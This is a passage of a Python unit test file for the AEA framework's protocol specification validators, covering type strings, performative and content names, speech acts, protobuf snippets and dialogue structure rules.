_is_valid_union(invalid_content_type_7) is False invalid_content_type_8 = "pt:union[]" assert _is_valid_union(invalid_content_type_8) is False invalid_content_type_9 = "pt:union[pt:str, pt:int, pt:str]" assert _is_valid_union(invalid_content_type_9) is False invalid_content_type_10 = "pt:union[pt:set[pt:integer], pt:float]" assert _is_valid_union(invalid_content_type_10) is False invalid_content_type_11 = ( "pt:union[pt:dict[pt:set[pt:bool]], pt:list[pt:set[pt:str]]]" ) assert _is_valid_union(invalid_content_type_11) is False invalid_content_type_12 = "pt:union" assert _is_valid_union(invalid_content_type_12) is False def test_is_valid_optional(self): """Test for the '_is_valid_optional' method.""" valid_content_type_1 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_optional(valid_content_type_1) is True valid_content_type_2 = "pt:optional[pt:union[pt:bytes, pt:set[pt:int]]]" assert _is_valid_optional(valid_content_type_2) is True valid_content_type_3 = "pt:optional[pt:bytes]" assert _is_valid_optional(valid_content_type_3) is True valid_content_type_4 = "pt:optional[pt:int]" assert _is_valid_optional(valid_content_type_4) is True valid_content_type_5 = "pt:optional[pt:float]" assert _is_valid_optional(valid_content_type_5) is True valid_content_type_6 = "pt:optional[pt:bool]" assert _is_valid_optional(valid_content_type_6) is True valid_content_type_7 = "pt:optional[pt:str]" assert _is_valid_optional(valid_content_type_7) is True valid_content_type_8 = "pt:optional[pt:set[pt:bytes]]" assert _is_valid_optional(valid_content_type_8) is True valid_content_type_9 = "pt:optional[pt:list[pt:int]]" assert _is_valid_optional(valid_content_type_9) is True valid_content_type_10 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_optional(valid_content_type_10) is True ################################################### invalid_content_type_1 = "pt:optinal[pt:bytes]" assert _is_valid_optional(invalid_content_type_1) is False invalid_content_type_2 = "optional[pt:int]" assert _is_valid_optional(invalid_content_type_2) is False invalid_content_type_3 = "pt: optional[pt:float]" assert _is_valid_optional(invalid_content_type_3) is False invalid_content_type_4 = "pt:optional[bool]" assert _is_valid_optional(invalid_content_type_4) is False invalid_content_type_5 = "pt:optional[pt:str" assert _is_valid_optional(invalid_content_type_5) is False invalid_content_type_6 = "pt:optional{pt:set[pt:int]]" assert _is_valid_optional(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:string]" assert _is_valid_optional(invalid_content_type_7) is False invalid_content_type_8 = "pt:optional[]" assert _is_valid_optional(invalid_content_type_8) is False invalid_content_type_9 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_optional(invalid_content_type_9) is False invalid_content_type_10 = "pt:optional[pt:list[pt:boolean]]" assert _is_valid_optional(invalid_content_type_10) is False invalid_content_type_11 = "pt:optional[pt:dict[pt:set[pt:int]]]" assert _is_valid_optional(invalid_content_type_11) is False invalid_content_type_12 = "pt:optional" assert _is_valid_optional(invalid_content_type_12) is False def test_is_valid_content_type_format(self): """Test for the '_is_valid_content_type_format' method.""" valid_content_type_1 = "ct:DataModel" assert _is_valid_content_type_format(valid_content_type_1) is True valid_content_type_2 = "pt:int" assert _is_valid_content_type_format(valid_content_type_2) is True valid_content_type_3 = "pt:set[pt:float]" assert _is_valid_content_type_format(valid_content_type_3) is True valid_content_type_4 = "pt:list[pt:bool]" assert _is_valid_content_type_format(valid_content_type_4) is True valid_content_type_5 = "pt:dict[pt:bool,pt:float]" assert _is_valid_content_type_format(valid_content_type_5) is True valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) assert _is_valid_content_type_format(valid_content_type_6) is True valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) assert _is_valid_content_type_format(valid_content_type_7) is True ################################################### invalid_content_type_1 = "ct:data" assert _is_valid_content_type_format(invalid_content_type_1) is False invalid_content_type_2 = "bool" assert _is_valid_content_type_format(invalid_content_type_2) is False invalid_content_type_3 = "pt: set[pt:int]" assert _is_valid_content_type_format(invalid_content_type_3) is False invalid_content_type_4 = "pt:list[string]" assert _is_valid_content_type_format(invalid_content_type_4) is False invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" assert _is_valid_content_type_format(invalid_content_type_5) is False invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" assert _is_valid_content_type_format(invalid_content_type_6) is False invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" assert _is_valid_content_type_format(invalid_content_type_7) is False def test_validate_performatives(self): """Test for the '_validate_performatives' method.""" valid_content_type_1 = "offer" valid_result_1, valid_msg_1 = _validate_performatives(valid_content_type_1) assert valid_result_1 is True assert valid_msg_1 == "Performative '{}' is valid.".format(valid_content_type_1) valid_content_type_2 = "send_HTTP_message" valid_result_2, valid_msg_2 = _validate_performatives(valid_content_type_2) assert valid_result_2 is True assert valid_msg_2 == "Performative '{}' is valid.".format(valid_content_type_2) valid_content_type_3 = "request_2PL" valid_result_3, valid_msg_3 = _validate_performatives(valid_content_type_3) assert valid_result_3 is True assert valid_msg_3 == "Performative '{}' is valid.".format(valid_content_type_3) valid_content_type_4 = "argue" valid_result_4, valid_msg_4 = _validate_performatives(valid_content_type_4) assert valid_result_4 is True assert valid_msg_4 == "Performative '{}' is valid.".format(valid_content_type_4) ################################################### invalid_content_type_1 = "_offer" invalid_result_1, invalid_msg_1 = _validate_performatives( invalid_content_type_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_1, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_2 = "request_" invalid_result_2, invalid_msg_2 = _validate_performatives( invalid_content_type_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_2, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_3 = "_query_" invalid_result_3, invalid_msg_3 = _validate_performatives( invalid_content_type_3 ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_3, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_4 = "$end" invalid_result_4, invalid_msg_4 = _validate_performatives( invalid_content_type_4 ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_4, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_5 = "create()" invalid_result_5, invalid_msg_5 = _validate_performatives( invalid_content_type_5 ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_content_type_5, PERFORMATIVE_REGEX_PATTERN ) ) invalid_content_type_6 = "_body" invalid_result_6, invalid_msg_6 = _validate_performatives( invalid_content_type_6 ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. This name is reserved.".format( invalid_content_type_6, ) ) invalid_content_type_7 = "message_id" invalid_result_7, invalid_msg_7 = _validate_performatives( invalid_content_type_7 ) assert invalid_result_7 is False assert ( invalid_msg_6 == "Invalid name for performative '{}'. This name is reserved.".format( invalid_content_type_6, ) ) def test_validate_content_name(self): """Test for the '_validate_content_name' method.""" performative = "some_performative" valid_content_type_1 = "content" valid_result_1, valid_msg_1 = _validate_content_name( valid_content_type_1, performative ) assert valid_result_1 is True assert valid_msg_1 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_1, performative ) valid_content_type_2 = "HTTP_msg_name" valid_result_2, valid_msg_2 = _validate_content_name( valid_content_type_2, performative ) assert valid_result_2 is True assert valid_msg_2 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_2, performative ) valid_content_type_3 = "number_of_3PLs" valid_result_3, valid_msg_3 = _validate_content_name( valid_content_type_3, performative ) assert valid_result_3 is True assert valid_msg_3 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_3, performative ) valid_content_type_4 = "model" valid_result_4, valid_msg_4 = _validate_content_name( valid_content_type_4, performative ) assert valid_result_4 is True assert valid_msg_4 == "Content name '{}' of performative '{}' is valid.".format( valid_content_type_4, performative ) ################################################### invalid_content_type_1 = "_content" invalid_result_1, invalid_msg_1 = _validate_content_name( invalid_content_type_1, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_1, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_2 = "content_" invalid_result_2, invalid_msg_2 = _validate_content_name( invalid_content_type_2, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_2, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_3 = "_content_" invalid_result_3, invalid_msg_3 = _validate_content_name( invalid_content_type_3, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_3, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_4 = "con^en^" invalid_result_4, invalid_msg_4 = _validate_content_name( invalid_content_type_4, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_4, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_5 = "some_content()" invalid_result_5, invalid_msg_5 = _validate_content_name( invalid_content_type_5, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for content '{}' of performative '{}'. Content names must match the following regular expression: {} ".format( invalid_content_type_5, performative, CONTENT_NAME_REGEX_PATTERN ) ) invalid_content_type_6 = "target" invalid_result_6, invalid_msg_6 = _validate_content_name( invalid_content_type_6, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( invalid_content_type_6, performative, ) ) invalid_content_type_7 = "performative" invalid_result_7, invalid_msg_7 = _validate_content_name( invalid_content_type_7, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( invalid_content_type_7, performative, ) ) def test_validate_content_type(self): """Test for the '_validate_content_type' method.""" performative = "some_performative" content_name = "some_content_name" valid_content_type_1 = "ct:DataModel" valid_result_1, valid_msg_1 = _validate_content_type( valid_content_type_1, content_name, performative ) assert valid_result_1 is True assert ( valid_msg_1 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_2 = "pt:int" valid_result_2, valid_msg_2 = _validate_content_type( valid_content_type_2, content_name, performative ) assert valid_result_2 is True assert ( valid_msg_2 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_3 = "pt:set[pt:float]" valid_result_3, valid_msg_3 = _validate_content_type( valid_content_type_3, content_name, performative ) assert valid_result_3 is True assert ( valid_msg_3 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_4 = "pt:list[pt:bool]" valid_result_4, valid_msg_4 = _validate_content_type( valid_content_type_4, content_name, performative ) assert valid_result_4 is True assert ( valid_msg_4 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_5 = "pt:dict[pt:bool,pt:float]" valid_result_5, valid_msg_5 = _validate_content_type( valid_content_type_5, content_name, performative ) assert valid_result_5 is True assert ( valid_msg_5 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_6 = ( "pt:optional[pt:union[pt:bytes, pt:int, pt:float, pt:bool, pt:str, pt:set[pt:bytes], " "pt:set[pt:int], pt:set[pt:float], pt:set[pt:bool], pt:set[pt:str], " "pt:list[pt:bytes], pt:list[pt:int], pt:list[pt:float], pt:list[pt:bool], pt:list[pt:str], " "pt:dict[pt:bytes, pt:bytes], pt:dict[ pt:bytes , pt:int ] , pt:dict[pt:bytes, pt:float], pt:dict[pt:bytes, pt:bool], pt:dict[pt:bytes, pt:str], " "pt:dict[pt:int, pt:bytes], pt:dict[pt:int, pt:int], pt:dict[pt:int, pt:float], pt:dict[pt:int, pt:bool], pt:dict[pt:int, pt:str], " "pt:dict[pt:float, pt:bytes], pt:dict[pt:float, pt:int], pt:dict[pt:float, pt:float], pt:dict[pt:float, pt:bool], pt:dict[pt:float, pt:str], " "pt:dict[pt:bool, pt:bytes], pt:dict[pt:bool, pt:int], pt:dict[pt:bool,pt:float], pt:dict[pt:bool, pt:bool], pt:dict[pt:bool, pt:str], " "pt:dict[pt:str, pt:bytes], pt:dict[pt:str, pt:int], pt:dict[pt:str,pt:float], pt:dict[pt:str, pt:bool], pt:dict[pt:str, pt:str]]]" ) valid_result_6, valid_msg_6 = _validate_content_type( valid_content_type_6, content_name, performative ) assert valid_result_6 is True assert ( valid_msg_6 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) valid_content_type_7 = ( " pt:optional[ pt:dict[ pt:float , pt:bool ] ] " ) valid_result_7, valid_msg_7 = _validate_content_type( valid_content_type_7, content_name, performative ) assert valid_result_7 is True assert ( valid_msg_7 == "Type of content '{}' of performative '{}' is valid.".format( content_name, performative ) ) ################################################### invalid_content_type_1 = "ct:data" invalid_result_1, invalid_msg_1 = _validate_content_type( invalid_content_type_1, content_name, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_2 = "bool" invalid_result_2, invalid_msg_2 = _validate_content_type( invalid_content_type_2, content_name, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_3 = "pt: set[pt:int]" invalid_result_3, invalid_msg_3 = _validate_content_type( invalid_content_type_3, content_name, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_4 = "pt:list[string]" invalid_result_4, invalid_msg_4 = _validate_content_type( invalid_content_type_4, content_name, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" invalid_result_5, invalid_msg_5 = _validate_content_type( invalid_content_type_5, content_name, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" invalid_result_6, invalid_msg_6 = _validate_content_type( invalid_content_type_6, content_name, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" invalid_result_7, invalid_msg_7 = _validate_content_type( invalid_content_type_7, content_name, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_speech_acts_section(self, mocked_spec): """Test for the '_validate_speech_acts_section' method.""" valid_speech_act_content_config_1 = SpeechActContentConfig( content_1="ct:CustomType", content_2="pt:int" ) valid_speech_act_content_config_2 = SpeechActContentConfig( content_3="ct:DataModel" ) valid_speech_act_content_config_3 = SpeechActContentConfig() speech_act_1 = CRUDCollection() speech_act_1.create("perm_1", valid_speech_act_content_config_1) speech_act_1.create("perm_2", valid_speech_act_content_config_2) speech_act_1.create("perm_3", valid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_1 ( valid_result_1, valid_msg_1, valid_all_per_1, valid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Speech-acts are valid." assert valid_all_per_1 == {"perm_1", "perm_2", "perm_3"} assert valid_all_content_1 == {"ct:CustomType", "ct:DataModel"} ################################################### speech_act_3 = CRUDCollection() invalid_perm = "_query_" speech_act_3.create(invalid_perm, valid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_3 ( invalid_result_1, invalid_msg_1, invalid_all_per_1, invalid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_perm, PERFORMATIVE_REGEX_PATTERN ) ) assert invalid_all_per_1 is None assert invalid_all_content_1 is None invalid_speech_act_content_config_1 = SpeechActContentConfig(target="pt:int") speech_act_4 = CRUDCollection() valid_perm = "perm_1" speech_act_4.create(valid_perm, invalid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_4 ( invalid_result_2, invalid_msg_2, invalid_all_per_2, invalid_all_content_2, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( "target", valid_perm, ) ) assert invalid_all_per_2 is None assert invalid_all_content_2 is None invalid_speech_act_content_config_2 = SpeechActContentConfig( content_name_1="pt: set[pt:int]" ) speech_act_5 = CRUDCollection() speech_act_5.create(valid_perm, invalid_speech_act_content_config_2) mocked_spec.speech_acts = speech_act_5 ( invalid_result_3, invalid_msg_3, invalid_all_per_3, invalid_all_content_3, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content 'content_name_1' of performative '{}'. See documentation for the correct format of specification types.".format( valid_perm, ) ) assert invalid_all_per_3 is None assert invalid_all_content_3 is None speech_act_6 = CRUDCollection() mocked_spec.speech_acts = speech_act_6 ( invalid_result_4, invalid_msg_4, invalid_all_per_4, invalid_all_content_4, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_4 is False assert invalid_msg_4 == "Speech-acts cannot be empty!" assert invalid_all_per_4 is None assert invalid_all_content_4 is None invalid_speech_act_content_config_3 = SpeechActContentConfig(content_name_1=123) speech_act_7 = CRUDCollection() speech_act_7.create(valid_perm, invalid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_7 ( invalid_result_5, invalid_msg_5, invalid_all_per_5, invalid_all_content_5, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_5 is False assert ( invalid_msg_5 == f"Invalid type for '{'content_name_1'}'. Expected str. Found {type(123)}." ) assert invalid_all_per_5 is None assert invalid_all_content_5 is None invalid_speech_act_content_config_4 = SpeechActContentConfig( content_name_1="pt:int" ) invalid_speech_act_content_config_5 = SpeechActContentConfig( content_name_1="pt:float" ) speech_act_8 = CRUDCollection() speech_act_8.create("perm_1", invalid_speech_act_content_config_4) speech_act_8.create("perm_2", invalid_speech_act_content_config_5) mocked_spec.speech_acts = speech_act_8 ( invalid_result_6, invalid_msg_6, invalid_all_per_6, invalid_all_content_6, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_6 is False assert ( invalid_msg_6 == "Content 'content_name_1' with type 'pt:float' under performative 'perm_2' is already defined under performative 'perm_1' with a different type ('pt:int')." ) assert invalid_all_per_6 is None assert invalid_all_content_6 is None @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_protocol_buffer_schema_code_snippets(self, mocked_spec): """Test for the '_validate_protocol_buffer_schema_code_snippets' method.""" valid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;\nrepeated int32 set_field = 6;\nrepeated string list_field = 7;\nmap<int32, bool> dict_field = 8;\n" } valid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = valid_protobuf_snippet_1 valid_result_1, valid_msg_1, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_1 ) assert valid_result_1 is True assert valid_msg_1 == "Protobuf code snippet section is valid." valid_protobuf_snippet_2 = {} valid_all_content_2 = set() mocked_spec.protobuf_snippets = valid_protobuf_snippet_2 valid_result_2, valid_msg_2, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_2 ) assert valid_result_2 is True assert valid_msg_2 == "Protobuf code snippet section is valid." ################################################### invalid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;", "ct:Query": "bytes bytes_field = 1;", } invalid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_1 ( invalid_result_1, invalid_msg_1, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Extra protobuf code snippet provided. Type 'ct:Query' is not used anywhere in your protocol definition." ) invalid_protobuf_snippet_2 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;", } invalid_all_content_2 = {"ct:DataModel", "ct:Frame"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_2 ( invalid_result_2, invalid_msg_2, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "No protobuf code snippet is provided for the following custom types: {}".format( {"ct:Frame"}, ) ) def test_validate_field_existence(self): """Test for the '_validate_field_existence' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": [ "performative_mt", "performative_o", "performative_empty_contents", ], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } ( valid_result_1, valid_msg_1, ) = _validate_field_existence(valid_dialogue_config_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section has all the required fields." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1.pop("initiation") ( invalid_result_1, invalid_msg_1, ) = _validate_field_existence(invalid_dialogue_config_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Missing required field 'initiation' in the dialogue section of the protocol specification." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2.pop("reply") ( invalid_result_2, invalid_msg_2, ) = _validate_field_existence(invalid_dialogue_config_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Missing required field 'reply' in the dialogue section of the protocol specification." ) def test_validate_initiation(self): """Test for the '_validate_initiation' method.""" valid_initiation_1 = ["perm_1", "perm_2"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_result_1, valid_msg_1 = _validate_initiation( valid_initiation_1, valid_performatives_set ) assert valid_result_1 is True assert valid_msg_1 == "Initial messages are valid." ################################################### invalid_initiation_1 = [] invalid_result_1, invalid_msg_1 = _validate_initiation( invalid_initiation_1, valid_performatives_set ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one initial performative for this dialogue must be specified." ) invalid_initiation_2 = ["perm_5"] invalid_result_2, invalid_msg_2 = _validate_initiation( invalid_initiation_2, valid_performatives_set ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_initiation_3 = "perm_1" invalid_result_3, invalid_msg_3 = _validate_initiation( invalid_initiation_3, valid_performatives_set ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for initiation. Expected list. Found '{type(invalid_initiation_3)}'." ) def test_validate_reply(self): """Test for the '_validate_reply' method.""" valid_reply_1 = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } ( valid_result_1, valid_msg_1, terminal_performatives_from_reply_1, ) = _validate_reply(valid_reply_1, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Reply structure is valid." assert terminal_performatives_from_reply_1 == { "performative_mt", "performative_o", } ################################################### invalid_reply_1 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": [], } invalid_performatives_set_1 = {"perm_1", "perm_2", "perm_3", "perm_4", "perm_5"} ( invalid_result_1, invalid_msg_1, invalid_terminal_performatives_from_reply_1, ) = _validate_reply(invalid_reply_1, invalid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "No reply is provided for the following performatives: {}".format( {"perm_5"}, ) ) assert invalid_terminal_performatives_from_reply_1 is None invalid_reply_2 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_5"], "perm_5": [], } invalid_performatives_set_2 = {"perm_1", "perm_2", "perm_3", "perm_4"} ( invalid_result_2, invalid_msg_2, invalid_terminal_performatives_from_reply_2, ) = _validate_reply(invalid_reply_2, invalid_performatives_set_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' in the list of replies for 'perm_4' is not defined in speech-acts." ) assert invalid_terminal_performatives_from_reply_2 is None invalid_reply_3 = ["perm_1", "perm_2", "perm_3", "perm_4", "perm_5"] ( invalid_result_3, invalid_msg_3, invalid_terminal_performatives_from_reply_3, ) = _validate_reply(invalid_reply_3, invalid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for the reply definition. Expected dict. Found '{type(invalid_reply_3)}'." ) assert invalid_terminal_performatives_from_reply_3 is None invalid_reply_4 = { "perm_1": {"perm_2"}, "perm_2": {"perm_3"}, "perm_3": {"perm_4"}, "perm_4": {"perm_5"}, "perm_5": set(), } ( invalid_result_4, invalid_msg_4, invalid_terminal_performatives_from_reply_4, ) = _validate_reply(invalid_reply_4, invalid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for replies of performative perm_1. Expected list. Found '{type({'perm_2'})}'." ) assert invalid_terminal_performatives_from_reply_4 is None invalid_reply_5 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_1"], "perm_5": [], } ( invalid_result_5, invalid_msg_5, invalid_terminal_performatives_from_reply_5, ) = _validate_reply(invalid_reply_5, invalid_performatives_set_2) assert invalid_result_5 is False assert ( invalid_msg_5 == "Performative 'perm_5' specified in \"reply\" is not defined in the protocol's speech-acts." ) assert invalid_terminal_performatives_from_reply_5 is None def test_validate_termination(self): """Test for the '_validate_termination' method.""" valid_termination_1 = ["perm_4", "perm_3"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_terminal_performatives_from_reply_1 = {"perm_4", "perm_3"} valid_result_1, valid_msg_1 = _validate_termination( valid_termination_1, valid_performatives_set, valid_terminal_performatives_from_reply_1, ) assert valid_result_1 is True assert valid_msg_1 == "Terminal messages are valid." ################################################### invalid_termination_1 = [] invalid_terminal_performatives_from_reply_1 = set() invalid_result_1, invalid_msg_1 = _validate_termination( invalid_termination_1, valid_performatives_set, invalid_terminal_performatives_from_reply_1, ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one terminal performative for this dialogue must be specified." ) 